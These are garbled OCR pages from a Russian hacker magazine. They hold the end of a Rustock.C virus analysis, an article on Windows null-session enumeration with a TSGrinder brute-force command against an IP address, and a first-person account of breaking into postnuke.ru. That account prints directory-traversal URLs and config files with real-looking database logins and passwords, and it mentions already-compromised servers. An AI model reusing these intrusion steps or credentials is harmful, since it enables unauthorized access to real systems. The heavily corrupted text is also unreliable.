ЫЕЕ_ЗЕСЗ I ЫЕЕ_ЕЗСЗ | ВЕЕ_ЫАМЕ | ЫЕЕ_ІМРЗ | ЫЕЕ_СОВЕ , Ій) ; 

1оай_попЫпагу_1і1е ( "ЫТВЕЕ.ВЕЕ" , "ЫТВЕЕ.ВЕЕ" , " . " , 
ЫЕЕ_ЗЕСЗ I ЫЕЕ_ЕЗСЗ | ЕЕЕ_ЫАМЕ | ЫЕЕ_ІМРЗ | ЫЕЕ_СОВЕ , Ій) ; 
дігее ( Ій) ; 

} 



Возникает резонный вопрос: какжить дальше и что с этим делать? 
Спускаться в ядро как-то не хочется. И правильно! Поднять ядро на при- 
кладной уровень намного быстрее, да и надежнее! ІОА-Рго позволяет 
грузить куда более одного файла одновременно. Это осуществляется 
посредством вызова функции 1оай_попЬіпагу_1і1е (), доступной из 
ріид-іп’ов, но отсутствующей в пользовательском интерфейсе. 

О К, пишем р[ид-іп, грузящий любые библиотеки и драйвера, какие мы 
только захотим (включая ядро операционной системы). После чего 



Начиная с ІОА-Рго 4.8, прототип функции 1оай_попЬіпагу_1і1е ( ) 
был злостно изменен без всякой заботы об обратной совместимости. 
Старые ріид-іп’ы перестали работать, однако небольшая косметическая 
операция решает проблему! 

ЗАГРУЗКА НЕСКОЛЬКИХ ФАЙЛОВ В ОДНУ БАЗУ ІОА-РЯО 4.8+ 

ѵоій ійаарі гип(іпЕ агд) 

{ 
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Переплетенныетесным клубком функции расшифровщика второго уровня 




1оасі_іп:Ео_1: *1сі; 

Ѵ7агпіпд ( "ріидіп \ "сіиа1-1оасі\ " із саііесі!"); 

/* ЫОТЕ: КЕКЕЕЦ3 2 . ВЕЕ апй ЫТБЕЕ . ВЕЕ Еаз Ео Ье іп ЕЕе 
сиггепЕ сіігесЕогу! ! ! */ 

1іприЕ_Е *р = ореп_1іприЕ ( "КЕЕВЕЕ32 .ВЕЕ" , Еаізе) ; 

// Еіх 

ІСІ = Ьиі1(і_1оа(іегз_1ізЕ (р) ; 

1оасі_попЬіпагу_Еі1е ( "КЕЕЫЕЕ32 . ВЕЕ" , р, 

ЫЕЕ_ЗЕСЗ I ЫЕЕ_ЕЗСЗ | ЫЕЕ_ЫАМЕ | ВЕЕ_ІМРЗ | ЫЕЕ_ 
СОВЕ, 

ІсЗ) ; 

с1озе_1іприЕ (р) ; 

} 

С загруженным ядром расшифровщик второго уровня снимается в ІОА- 
Рго на ура, и мы попадаем в... третий. А вот в нем нас ждет настоящий 
«подарок» судьбы, высаживающий на измену. Вирус, обращаясь к 
РСІ-шине, извлекает оттуда параметры моста «РСІ/І5А», формируя 
РС4-КЛЮЧ на основе Веѵісе ІВ и Ѵепсіог ІВ, перебрать которые 
тупым Вгиіе-Рогсе нереально. Да и не нужно! 

Роковая ошибка создателя Ризіоск. С заключается втом, что произво- 
дителей чипсетов (где, собственно говоря, и находится обозначенный 
мост) нетакужи много. Просто идем на любую достаточно полнуюон- 
лайновую базу РСІ -устройств (например, ѵѵѵѵѵѵ. рсісіаіа базе. сот I. даем 
запрос — и осуществляем элегантный перебор на небольшой выборке. 
Все! С падением последнего бастиона с вирусом можно делать все, что 
угодно. Например, отломав детектор ѴМѴѴаге (которая определяется через 
ЮТ), запустить его в среде виртуальной машины, наблюдая за изменениями 



в памяти и файловой системе. Никакие маскировочные приемы не помогут 
против посекторного сравнения образов виртуального жесткого диска (до и 
после заражения). Тоже самое относится и кдампам памяти. Вторая ошибка 
создателя ВизІоск.С — отсутствие перехвата функции КеВидСЕескЕх, 
которая, собственно, и сбрасывает дамп на диск. 

Н ЗАКЛЮЧЕНИЕ 

Авотнекоторые незаморачиваются с ручной распаковкой и эмуляцией, 
запуская вирусы поддоброкачественным виртуализатором. С ним Визіоск. 
С никак не сражается. Помимо 5ЕУЕ -эмулятора (недоступного широким 
массам), вполне сгодится и В0СН5, в котором (сучетом наличия исходных 
текстов) ничего не стоит подделать Веѵісе ІВ и Ѵепсіог ІВ. Правда, 
мы должны заранее знать, что чипсетустановлен на зараженной машине. 
Пользы (познавательного плана) в подобном способе запуска вируса не- 
много. Нормальные вирусы вообще-то и без танцев с бубном запускаются. 
Наибольший интерес представляет именно скрупулезный анализ вируса 
и используемых их приемов, многие их которых стоит взять на вооруже- 
ние. Если не на свое,такхоть на чужое, в смысле приготовиться кпояв- 
лению «зверьков», оборудованных модулями, выдранными из ВизІоск.С 
(и, возможно, основательно доработанными).^-^ 



іЬге.соНесбѵех.сот — сообще ство профессиональных реверс еров и| 
іакеров, живущих по понятиям) 
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АНДРЕЙ «ЗКѴ2» КОМАРОВІ 



ИТРЫЕ ПРИЕМЫ БЫВАЛОГО ХАКЕРА 



|В сетевой атаке используется немыслимое число хакерских инструментов 



|В андеграунде даже говорят, что от количества утилит зависит про 



Іонализм взломщика. Но самые интересные взломы происходят внезапно 



на улице с полуразряженным ноутОуком, в уь 



|не — в оощем, там, где возможности слить определенный со 



осто нет. 



[Приходится проявить максимум смекалки и либо пользоваться тем, что 



[предоставляет твоя собственная ОС, либоиметь боевой комплект на все 



[случаи жизни. О 



этом минимальном комплекте я сейчас расскаж 



есмотря на пафосные крики на форумах о том, что «Винда 
— сакс, два клика — пароль в руках», в ряде случаев 
завершить (а иногда, даже и инициировать) взлом не 
получается. В этой статье тебя ожидает подборка уловок, 
которые позволят чувствовать себя увереннее при штурме ѴѴіпбоѵѵз. 
Итак, поехали! 

В НУЛЕВАЯ СЕССИЯ 

ИЛИ ПОЛУЧЕНИЕ СПИСКА ПОЛЬЗОВАТЕЛЕЙ 

Нулевая сессия — лучшая лазейка для удаленного сбора информа- 
ции с виндовой машины через МеіВІОЗ. Но даже зная это, нередко 
возникает вопрос, как правильно использовать нулевую сессию. 
Лучшей, на мой взгляд, программой для эксплуатации нулевых 
сессий является ѴѴіпІ'о [ пІзесигіІѵ.пиЛооІЬох/ѵѵіпЬ ]. Убедительная 



просьба не путать софтину с другими ѵѵіпЬ (для сбора информации с 
локальной машины: хэндл окна, положение мыши и т.п). 

Синтаксис команды предельно прост: іѵіпбо . ехе ІР-адрес -п - 
V. Замечу, что существует ряд ограничений, не позволяющих забрать 
с удаленной машины необходимые данные о пользователях. Напри- 
мер, применение параметра «КезСгісСАпопутоиз = » со значени- 
ями 1 и 2. Ключи реестра: НКЬМ\ЗузСет\СиггепССопСго13еС\ 
СопСго1\Ьза\КезСгісСАпопутоиз = 1 (запрет показа шар; при 
этом анонимно авторизированные пользователи будут их видеть 
— значение 2 наотрез отсекает и то, и другое). Более того, анонимные 
подключения используются различными служебными программами 
(такими, как проводник МісгозоЛ ѴѴіпбоѵѵз, редактор таблиц доступа 
и диспетчер пользователей) для администрирования нескольких 
доменов ѴѴіпбоѵѵз. За примером далеко ходить не надо: при уста- 




► об4 
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ІТакломаюттерминальные пароли| 



> ІП^О 

Статья VI кто ко 
[Сгузіаі] на гооІкТа. 
ги/[1Ьга гу/ОЬоууЫЬ. 
азрх?ісІ [=19 . 



> Ііпкз 

Более подробно о 
встроенных аккаун- 
тах и дефолтных 5І0 
ты можешьузнать на 
зиррогТтісгозоК. 
со 00/6013 ц и. 
азрх?зсі6^КВ;еп- 
□ 3:163846 . 



• ѲеіАссІ [ зесиоііѵіоібаѵ.сооп/іооіз/деіассі зІа.ЫопІ ). 

Все, что требуется для определения 5ІВ — указать ІР или 
МЕТВІ05-ИМЯ машины. Вторым параметром —диапазон 
РІО. Дело в том, что РІО — это последняя часть 51 В (доба- 
вочная). Соответственно, указав определенный интер- 
вал, мы оораничиваем пределы перебора для поиска 51 В. 

• Ритризегз ( ѵѵѵѵѵѵ.пІзесиоіІѵ.пи/іооІЬох/биопризеоз/ ). 
Консольная аналооия вышеназванной проораммы. Обе 
проои ты найдешь на нашем диске. 

Отмечу, что основополаоающими в работе софта являются 
алгоритмы, написанные нашими соотечественниками 
[ еѵдепіі.гибпѵі.ги/зоіі/зіб/ ] в проектах изег2зі6 и зі62изег. 
Не обойди стороной эту страницу, авторы прилагают 
исходный код! 

Н ЗАХВАТ ТЕРМИНАЛА 

Иногда знание учетных записей пользователей позволяет 
успешно захватить терм и нал. Впрочем, надо понимать, что 
не всем пользователям разрешено быть в группе Реппоіе 
ВезкЬр изегз, тем более, когда цель атаки — контроллер 
домена. Втаком случае, подключаться поумолчанию к 
удаленной системе с использованием РВР разрешено 
только администратору. Между прочим, на днях обновилась 
самая лучшая утилита для взлома терминальных серверов 

— Т56РІМВЕР (геіеазе 2). В новой версии автором улучше- 
ны способы перебора пароля. Синтаксисзапуска прост, как 
два рубля: 

Сздгіпсіег — рагоіі . СхС — 1 ІееС — сі ѵ^огкдгоир 
— и асітіпізРгаРог — Ь -п 1 210.15.203.20, 

— где [ее! это файл для преобразования пароля в хакер- 
ско-читабельный (бЗкЗгг) ВИД: — 6 — указание на домен 
или рабочую группу. 



затрагивающая 
аспектпоиска имени 
активного пользо- 
вателя, позволит 
тебе улучшить свои 
представления об 
организации 510 и 
РІВ-идентифи ката- 
ров, об их примене- 
нии в системе и ее 
реестре. Обязательно 
прочти этот ценный 
материал! 



> ѵѵагпіпд 

Вся информация 
приведена исклю- 
чительно в ознако- 
мительных целях. 
Ответственность 
за ее применение 
несешьтолькоты. 
Помни об этом! 






новке служб N5 создаются два объекта пользователей: 
іизк_«имя машины» (служит для анонимного доступа 
к серверу) и ііл[АМ_«имя машины» (для запуска внепро- 
цессных приложений). Поэтому, если ты сразуже ринулся 
применять значение «2» в вышеуказанном ключе 
реестра, хорошенько подумай — не помешаетли опция 
работе легитимных пользователей. Оимптомом значения 
«2» будетошибка: «ІІпаЫеіо Ьгоѵѵзе іЬе зеіесіесі сіотаіп 
Ьесаизе іЬе ^оііоѵѵіпд еггог оссиггесі:». 

Переходим к следующему ключу реестра: нкьм\ 
ЗузСет\СиггепССопСго13еЦ\СопСго1\Ьза\ 
КезЦгісСАпопутоизЗАМ=1 (запрет показа пользова- 
тельских аккаунтов). 

И, наконец, нкеу_ьосаь_масніые\зузтем\ 
СиггепССопСгоІЗеСХЗегѵісез Маптапзегѵег 
(установить значение параметра ЕезСгісСЫиІІЗезз 
іопАссезз = і). Более подробно о значении ключей 
можно прочитать здесь — зиррогЕппісгозоІ'Есопп/беІаии. 
азрх?5СІ6 = КВ :еп- из :1 43474. 

Применение всехтрех ключей осложнитзадачу хакера, 
ноне сделает ее невыполнимой. Мало кто знает, что у 
ѴѴіпбоѵѵз есть «встроенные» (Ьиіи-іп) юзеры. Называ- 
ются они для разных региональных версий по-разно- 
му, но везде обозначают администратора и гостя. Эти 
учетные записи имеют фиксированные относительные 
идентификаторы РеІаЕѵе ІбепЕбег (ЕЮ). У администра- 
тора — 500, у гостя — 501 . Нумерация новых аккаунтов 
начинается с 1 000. Суть задумки — узнать уникальный 
51В группы или домена по существующим встроенным 
РІВ, используя анонимное подключение. Узнав 51В, 
мы легко можем вернуть соответствующие данные 
(ЬоокирАссоипСЫате, ЬоокирЗісіЫате). Этим занима- 
ются следующие программы, которые обязательно нужно 
скачать и изучить: 



взлом 

Ж'1 
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взлом 



[Получаем информацию о системных девайсах! 



[Используем ѵѵіпіо для получения информации 
р виндовых пользователях. Взведен флаг^Н 
ВезІгісіАпопуппоиз, поэт ому информациями 
[«секрет и тся»^И^^^'^Щ^Д^Д^Д^^Н 



ПІьлі^иГЛ. КГ 

к»ипѵр-с*ын>н ^ 

Ч.Ьіс іігыіікі.'^ ли I Кіі ІЛ Ііі'ри'ЧліііІ гм ^ >ч„і1 РлііИЧіЫіі- і:ііі-л 

>^ = '-Ъі<и^І!І.а АГіЛ ІЁСТ 1\ГЛСй-чни с ГФ.Н)ЯБг-ѴсКІИЛИЬ 

ТгАПѴП"П"'~ хІЧ-М Тг#-чИл р ЬТл 

П^ІІР4ІБ-Ѵ: иіЩЩДИЧІНИМ Т 

Тл-АПЕциіЛ I М]ЬуІсѵѴ94<іііГ^Геѵі|і_С^«0Ці:2Й[;В ЬО-ІГ ЧіСОС ІПіШпѣ-Ь\}Ч^'-‘ 

Л ЛіІ гпі.а ■ Ш№Б<Г1ІітН 

Т і-.ііч>;іі>іі 1 1 - ^[і«міі^«ѵ№1І:■Г ^^м■I|' 4МК6ПКЕ^П --Ы №С- іиР’з^ІИС^СЦ' , 

П^.іі^лі; іі'|Г^І«^А>гіЧІІИІ| и 

Тг.тт»рпп+і \Еѵи^гс-^«ігііг_ігі^ір_^'^йллэінгѵ Ьіііі г^пі иитз^діьгв* 

ЛЛгігоа яІ ІПСНІЛГ-1 яІЬі □ ‘43 9 

Т4Ч-ЯІ и Г Л тііІкгІ№И гііѵіг^г-йітіі 

СЗ \ йііЕ ііпиві. с лм I Ёп 1 1. I п-ркЧлліІ і'н ^ЧИлл-мчи л с г-ал ^ 



Слово 
о Ьгош8І:аі: 



В стандартном виндовом арсенале есть популярная и дельная 
команда — пен ѵіеѵѵ. Она позволяет просматривать сетевое окруже- 
ние в консольном режиме. Порой можно столкнуться с пробле- 
мой успешного ее выполненрія. Это связано с тем, что на домене 
отключена опция «Ьгоѵѵзіп^». Проверить, так это или нет, можно с 
помощью утилиты, часто используемой виндовыми системными 
администраторами — Ьгоѵѵзнан.ехе (ты найдешь ее на нашем дис- 
ке) . Синтаксис запуска: Ьгоѵѵзнан.ехе знашз. Подробнее об устране- 
нии ошибок, связанных с обозревателем окружения (8021, 8032), 
можно прочесть здесь: ^ . 



Определить — терминал перед тобой или нет, довольно сложно. Дело в 
том, что стандартный порт для подключения (3389 Іср/гбр) может быть 
изменен админом на нестандартный путем редактирования ключа: 
НКЕУ_Ь0САЬ_МАСНІЫЕ\ЗузЦет\СиггепЦСопЦго13еЦ\СопСго1\ 
Тегтіпа13егѵег\Ѵ\[іпЗЦаЦіопз\ЕЕР-Тср\РогЦМитЬег . Делается 
это так— в меню «Правка» выбирается команда «Изменить» и устанав- 
ливается система исчисления «Десятичная», а затем редактируется само 
поле. Поэтому хакеру требуется применять техники, отличные от простого 
поиска (какнапример, «птар 10.222.1.0/24 -р 3389»). Одной из 
них можно считать приведенный в моей статье «Терминальная эпопея» 
метод поиска через компонент ІзѵѵеЬ по Ооодіе (перерывай в поиске 
подшивку ][за 2006 год]. Можно пойти и другим путем, юзая программы 
РгоЬеТЗ и ТЗЕпит. 

РгоЬеІз использует РРС-вызовы для установления подлинности 
терминала, тем самым сканируя подсеть с целью поиска терминальных 
серверов. Синтаксис: РгоЬеСз . ехе 10.222.1.1 1 200 (последний 
параметр — конечный ІР-адрес из сканируемого диапазона). 
АвотвТЗЕпит применяется иной механизм детектирования. Когда 
рабочая станция или сервер присоединяются кдомену, они регистри- 
руют себя с помощью опции «тазіег Ьгоѵѵзег». Регистрация включает в 
себя указаниетипа сервера (терминал, файловый ит.п.). Эту информа- 
цию можноудаленно выудитьс помощью функции ЫеСЗегѵегЕпиш ( ) 

— что и проделывает тЗЕШт. 



В ЗНАЙ ВРАГА В ЛИЦО 

Представь себе, что с использованием анонимного подключе- 
ния реально перечислить все сетевые карты и их интерфейсы на 
удаленной машине. Выполнить это можно с помощью функции 
ЫеСЗегѵегТгапзрогСЕпит, даже если КезСгісСАпопушоиз имеет 
значение 1 . Для подобной цели создана утилита ТгапзрогСЕпит, 
которая возвращает данные о структуре зееѵее_теаызроет_іыео_0 
( пп5бп.ппісго5ОЙ.сопп/еп-и5/[ІЬгагѵ/аа370949(Ѵ5.85).а5Рх ). Между 
прочим, структура содержит информацию о количестве подключенных 
клиентов, названии сетевого интерфейса и адресации на нем. Програм- 
ма пишет нам С5І О устройства: 

ТгапзрогЦ : \Веѵісе\ЕеЦВТ_Тсрір_{СЕ081110-12бЕ-4ВВІ- 

88В0-2ЕЕ8СІВ83ВІ0} 

Асісігезз: ООсОІОбссіІѴа 

— то есть, данные отобычной сетевой карты и интерфейса ТСР/ІР. Так, 
кстати, получится узнать, поддерживает ли удаленная машина ѴѴі-Рі или 
какие-то экзотические вещи. Короче, дерзай, и удача тебе улыбнется ! 



Гожеѵѵіпіо. Без дополнительных настроек — имена какна ладони) 



► 066 
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Сетевое оборудование А81І8 




Превосходные решения 
для4Р-1Ьлефонии, 
видеонаблюдения 
и передачи данных 




А8и8СідаХ1108Ы 

8-портовый гигабитный коммутатор 
со встроенным блоком питания и 
поддержкой технологии ^итЬо 
Ргате 



А8У8 АХ-112ѴѴ 

Универсальный ѴѴІП 
маршрутизатор со встроенным 
адаптером ѴоІР (8ІР) для звонков 
через Интернет при помощи 
обычного телефона 



А8У8 СХ200 

ІР-камера со встроенным ѴѴеЬ- 
сервером и функцией детектора 
движения 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



Горячая линия А8и5: (495) 23-11-999 



Партнеры: Москва (495): БЮРОКРАТ (495) 745-55-11 ; Коосіоо Тесііпоіодіев (495) 256-17-31 ; 0101 (495) 22-11-111 ; ПИРИТ-Дистрибуция (495) 974-3210; ТКІМІТѴ-ЕІЕСТК0МІС5 ѵѵѵѵѵѵ.ігі-еі.ги; ІР Сотриіегз 961-00-09; ТесЬІіоте.ги 775-80- 
47; НИКС 974-33-33; Санрайз 542-80-70; СтартМастер 785-85-55; Формоза 234-21-64; Форум Компьютере 775-77-59; Профком 730-56-03; Ф-Центр 1 05-64-47; Электрон-Сервис 737-44-99; НТ Компьютер 363-93-93; УЗМ Сотриіегз 775-82-02; 
АРКИС (499) 61 2-96-90; Х-СОМ 7-999-600; Компьютер Маркет 500-03-04. 

С-Петербург (812): КЕЙ 074; Компьютерный Мир 333-00-33; СофтДжойс 335-96-20; КорСи 259-18-93; РУСВЕЙ 275-28-08. 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11; Воронеж: РЕТ (4732) 77-93-39; Владивосток: 0М5 (4232) 300-454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ 
Компьютер (343) 379-31-68; Жуковский: Байт (248) 7-41-38; Иркутск: Комтек-Компьютерз (3952) 258-338; Краснодар: Владос (861 ) 21 0-1 0-01 ; Красноярск: Старком (391 2) 49-1 1 -1 1 ; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега 
Импекс (81 52) 477-477; Нижний Новгород: ЮСТ (831 ) 225-28-23; Новокузнецк: Титан (3843) 70-38-38; Новосибирск: ЗЕТ НСК (383) 346-48-42, Техносити (383) 212-53-33, НТ Компьютер (383) 344-99-04; Омск: Компьюмаркет РИТМ (3812) 
23-05-05; Петрозаводск: Компания «Р1» (8142) 781-323; Пермь: НТ Компьютер (342) 237-15-73; Псков: Все для ПК(8112) 72-72-75; Ростов-на-Дону: Иманго (863) 232-47-18, НТ Компьютер (863) 295-30-20; Солнечногорск: Компьютерный 
мир (469-26) 4-87-69; Сургут: Компьютерный супермаркет «Первый»; Томск: ИНТАНТ (3822) 56-00-56; Тюмень: Техносити (3452) 26-1 9-72; Уфа: Форте ВД (347) 260-00-00, Кламас (347) 291 -21-12; Ярославль: Сеть компьютерных салонов 
«Фронтекс» (4852) 58-58-58. 
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Просматривая ежедневно десятки ресурсов, невольно выстраиваешь 
І)ейтинг наиболее распространенных бажных движков. Уныло полистав 
Рагтрак, я решил прогуляться по всем известному порталу от К.и55І^ 
РозШике Теат — шшѵѵ.розііпике.ги. Что из этого получилось, и чем прогулка 
экончилась, ты узнаешь, прочитав статью" 



Н ПЕРВОЕ ЗНАКОМСТВО 

Движки по типу «все включено» получили на просторах Сети широ- 
кое распространение. Зайдя на сайт ѵѵѵѵѵѵ.рогіпике.гц . я обнаружил 
что в качестве движка используется РозіМике (еще бы :)). Стоит ли 
говорить, что версия была последней, а значит, на дыры рассчиты- 
вать не приходилось. Набрав в адресной строке ѵѵѵѵѵѵ.рогіпике.ги/ 
гоЬоІз.ІхС я получил списокзапрещенных к индексации каталогов: 

изег-адепС: * 

Візаііоѵ^: асітіп.ріір 



Віза11оѵ7: 

Візаііоіл?: 

Візаііоѵ^: 

Візаііоіл?: 

Віза11оѵ7: 

Віза11оѵ7: 

Віза11оѵ7: 

Візаііоѵ^: 

Віза11о\л?: 

Віза11о\л?: 



сопіЕід 

Ііеасіег 

іЕооВег 

рпСаЫез 

ге:Еегег 

/ітадез 

/іпсіисіез 

/тосіиіез /N3- 

/рпасіосіЬ 

/Ытетез 
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Ксожалению, сЬтоб’ы на серверы были расставлены 
грамотно, так что никакой дополнительной информации 
мне получить не удалось. 

Тогда я вспомнил об удобном сервисе по сбору да иных 
из Гугла — табпеГпате/іооІз/табзз . Вбив урл атакуе- 
мого ресурса, буквально через пару секунд я лицезрел 
ответ: 

ІіЦЦр : / /розСпике . ги 
ІР: 91 . 194 .77.73 
ТИЦ: 550 
РК: 5 

Кеѵегзе ВЫЗ : 
тесіос . ЗОІІСІПО . ги 

Сервер : 

Араске/2 . о . 52 (СепСОЗ) 

Запрещено к индексированию: 

асітін . ркр 

сонГід 

ііеасіег 

Гоокег 

рнСаЫез 

геГегег 

/ ітадез 

/інсІисЗез 

/то(іи1ез/ЫЗ- 

/рнасЗосЗЬ 

/Рііетез 

/рнТетр 

/сіосз 

/З аѵазсгірЦ 

Сайты на сервере (КеѵегзеІР) : 
енегдодісі . ги [83.222.23.124] 

[83.222.23.174] 

Гііез . розкнике . ги [91.194.77.73] 

Ѵ7Ѵ\?Ѵ7. роз Спике . ги [91.194.77.73] 

Ѵ7Ѵ\?Ѵ7. ЗОІІСІПО . ги [91.194.77.73] 

Я безрезультатно проверил все имеющиеся ресурсы и 
углубился в изучение структуры и функционала ѵѵѵѵѵѵ. 
розіпике.ги . Через некоторое время мое внимание 



нь веб-каталога ѵѵѵѵѵѵ.розіпике.гиі 



привлек модуль ЗСаСіс Восз, который располагался 
по адресу: 

кССр : / . роз Спике . ги / інсіех . 

р1ір?тосіи1е = ЗСаСіс_Восз&Сипс=ѵіеѵ^ 

Когда я прошел по линку, передо мной оказалась дирек- 
тория с названием «сіоѵ^піоасіз»: 

кССр : / . роз Спике . ги / інсіех . 

р1ір?тосіи1е = ЗСаСіс_Восз&Сипс=ѵіеѵ^&С = сіО\л?п1оа 

(із / інсіех . кСтІ 

Взглянув на адресную строку браузера, а именно на пара- 
метр «[» и его значение, я судивлением обнаружил, что мо- 
дуль не имеет привязки к конкретному каталогу, а значит... 
Правильно! Я могсовершенно спокойно гулять по серверу, 
читая файлы и просматривая интересующие меня каталоги. 

Н ЭКСПЛУАТИРУЕМ УЯЗВИМОСТЬ 

Первым делом я принялся искать конфиги для подклю- 
чения к СУБД. Корень веб- катал о га располагался в 
/орДѵѵѵѵѵѵ/розІпике.ги . Сформировав запрос вида: 

кССр : / роз Спике . ги/інсіех . 

р1ір?то(іи1е = ЗСаСіс_Восз&Сипс=ѵіеѵ\[&С= . . / . . 

/орС/ 

розСнике . ги 

— я без труда получил листинг веб-директории сайта: 



(ІОСЗ 


4 КВ 


ВігесСогу 


05 


Дин, 2005 г . 


-21:39 






Сііез 


4 КВ 


ВігесСогу 


16 


РеЬ, 2005 г . 


-12:45 






ітадез 




4 КВ ВігесСогу 


05 Дин, 2005 


г. - 22 : 


17 




інсіисіез 


4 КВ 


ВігесСогу 


22 


Вес , 2 0 07 г . 


-15:39 






^ аѵазсгірС 


4 КВ 


ВігесСогу 


20 


Мау , 2 0 0 5 г . 


-21:34 






Іандиаде 


4 КВ 


ВігесСогу 


16 


Аид , 2 0 04 г . 


-09:58 






тосіиіез 


4 КВ 


ВігесСогу 


11 


ОсС , 2 005 г . 


-20:34 






рнТетр 




4 КВ ВігесСогу 


2 0 Мау , 2 0 0 5 


г. - 21 : 


22 




рнасіосіЬ 


4 КВ 


ВігесСогу 


15 




О 



> сіѵсі 

На нашем диске 
ты найдешь полное 
видео к статье. При- 
ятного просмотра! 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 
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Конфигв надежных ру ках| 

. ■Ікі> : 
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.-I 



Дап, 2006 г. — 20:14 
Дііетез 

18 Дип, 2005 г. -21:33 



4 КВ 



ВігесДогу 



■іО-гттНн 





ѵаг 


4 КВ 


Вігескогу 05 


(іеііпе ( ' ВВ_ЗЕКѴЕК ' , ' Іосаіііозк ' ) ; 




Дип, 2 005 г . — 


19 : 55 






сЗеІіпе ( ' ВВ_ЗЕКѴЕК_ВЗЕВМАМЕ ' , ' созто ' ) ; 


> іп^о 


. кСассезз 


91 К 


ІІпкпоѵ\[п 


05 Вип, 2005 


сЗеІіпе ( ' ВВ_ЗЕКѴЕК_РАЗЗШКВ ' , ' хххсозто ' ) ; 


• Большим плюсом 


г. -20:09 








(Іеііпе ( ' ВВ_ВАТАВАЗЕ ' , ' епд ' ) ; 


сточки зрения безо- 


асітіп . ркр 


4 КВ 


Зоигсе 


20 




пасности является 


Мау , 2 0 0 5 г . — 


21:22 






2 . 


ограничение в пра- 


Ьаскепсі . ркр 


б КВ 


Зоигсе 


20 


$соп1->ВВзегѵег = ітрогРРозк ( "ВВзегѵег" , 


вах и в возможности 


Мау , 2 0 0 5 г . — 


21:22 






"Іосаііюзк" ); 


удаленного подклю- 


Ьаппегз . ркр 


16 КВ 


Зоигсе 


20 


$соп1->ВВпате = ітрогРРозк ( "ВВпате", 


чения пользователей 


Мау , 2 0 0 5 г . — 


21:22 






"іл?ікі(іЬ" ) ; 


Му5С1. 


сопіід-оісі. ркр 


4 КВ 


Зоигсе 


$соп1->ВВизег = ітрогРРозк ( "ВВизег" , 




2 0 Мау , 2 0 05 


г. -21:22 


"іл?ікіизег " ) ; 


• Чем крупнее проект 


сопіід . ркр 


4 КВ 


Зоигсе 


05 


$соп1->ВВраззѵ70гсЗ = ітрогРРозк ( 


— тем больше вероят- 


Дип, 2 005 г . — 


21:41 






" ВВраззѵ70Г(1" ) ; 


ность наличия в нем 


еггог . ркр 


4 КВ 


Зоигсе 


20 


$соп1->ВВраззѵ70гс32 = РтрогСРозС ( 


уязвимостей. Смело 


Мау , 2 0 0 5 г . — 


21:22 






" ВВразз\л?ог(і2 " ); 


бросайся грудью на 


Іаѵісоп . ісо 


1 КВ 


ІІпкпоѵ^п 


15 Вес, 2004 


$соп1->ВВрге1іх = ітрогкРозк ( "ВВргеІіх" ); 


амбразуру и тестируй 


г. -16:08 










раскрученные ре- 


Іоокег . ркр 


3 КВ 


Зоигсе 


20 


3 . 


сурсы. 


Мау , 2 0 0 5 г . — 


21:22 






тузді : / /коЬЬу : гР7б зи8 9еіл[@1оса1}іоз1: 




кеасіег . ркр 


5 КВ 


Зоигсе 


20 






Мау , 2 0 0 5 г . — 


21:22 






4 . 




іпсіех . ркр 


4 КВ 


Зоигсе 


18 


$(іЬ_иг1 = ' тузді :/ /кгаѵеі : гР7бзи89еіл?@ 




Мау , 2 0 0 5 г . — 


18 : 54 






Іосаіііозк /кгаѵеі ' ; 




таіпіііе . ркр 


1 КВ 


Зоигсе 


20 


$(іЬ_рге1іх = ' ' ; 




Мау , 2 0 0 5 г . — 


21:22 










тосіиіез . ркр 


381 К 


Зоигсе 


20 


5 . 




Мау , 2 0 0 5 г . — 


21:22 






тузді : / /расіеЬезі : ігЬепазиІЗ ІОІосаІІіозС / 




рпСаЫез . ркр 


44 КВ 


Зоигсе 


20 


расіеЬезі 




Мау , 2 0 0 5 г . — 


21:22 










ргіпС . ркр 


10 КВ 


Зоигсе 


20 


В моем распоряжении появилось несколько аккаунтов. 




Мау , 2 0 0 5 г . — 


21:22 






Казалось бы, сомневаться в успехе не приходилось. 




геіегег . ркр 


4 КВ 


Зоигсе 


20 


но МуБОк-клиент раз за разом выдавал сообщение об 




Мау , 2 0 0 5 г . — 


21:22 






ошибке, сообщая, что удаленное подключение к СУБД 




гоЬоСз . кхк 


276 К 


Техк 


20 


на розіпике.ги невозможно. Такой расклад меня не 




Мау , 2 0 0 5 г . — 


21:22 






устраивал. Я принялся искать бэкапы, которые могли бы 




изег . ркр 








пролить свет на админки хостящихся на сервере ресур- 
сов. Вскоре соответствующая директория была найдена 




Меня заинтересовали два конфига: сопіід . ркр и 


- /орк/(іака/ВАСКиР: 




сопИд-оІС. ркр. 


Сба представляли собой стандарт- 






ные конфиги РозіМике. Прочитав перв 


ый (сопіід . 


екс 12 КВ Вігесксгу 10 Аид, 2007 



$рпсоп1ід [ ' сЗЬОуре ' ] = 'тузрі'; 

$рпсоп1ід [ ' (іЫіозО ' ] = ’ІосаІІюзР'; 

$рпсоп1ід [ ' сіЬипате ' ] = 'розРпикеги'; 
$рпсоп1ід [ ' сіЬразз ' ] = 'ги178$500'; 

$рпсоп1ід [ ' сіЬпате ' ] = 'розРпикеги'; 
$рпсоп1ід [ ' зузкет ' ] = '0'; 

$рпсоп1ід [ ' ргеііх ' ] = ’розОпике'; 

$рпсоп1ід [ ' епсосіесі ' ] = '0'; 

и 

в старой версии конфига поля логина и пароли были 
^ пустыми — непонятно, зачем его вообще хранили на 
сервере :). 

Тем временем я уже заливал Му50 к- клиент на один из 
поломанных ранее серверов, дабы подключиться к БД 
ѵѵѵѵѵѵ.розіпике.ги и сделать несколько дампов баз. Одна- 
ко, меня ждал облом — удаленное подключение к Му501 
в моем случае было невозможным. Хотя оставалась 
надежда, что с другими пользователями СУБД все может 
быть иначе и нужно только поискать. Потратив около по- 
лучаса на парсинг всевозможных каталогов на сервере, 
я составил список добытых аккаунтов от Му501: 



1 . 



ш 



»| 



ркр), я добрался до заветного аккаунта к СУБД: 



г. -04:05 



► 070 
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[Важный модуль Зіаііс РосД 



-м?и ■ ^іііі-р» 4К‘ ■ ГГ 
щ\!!^Ш±ши1Ш12Ли7А] [т2].27 3>] 
Лет ^мЬшко л; рі № ТТ.ТІ] 
«тераііпАЛі лі 1^1 ІМ Т? "Ц 



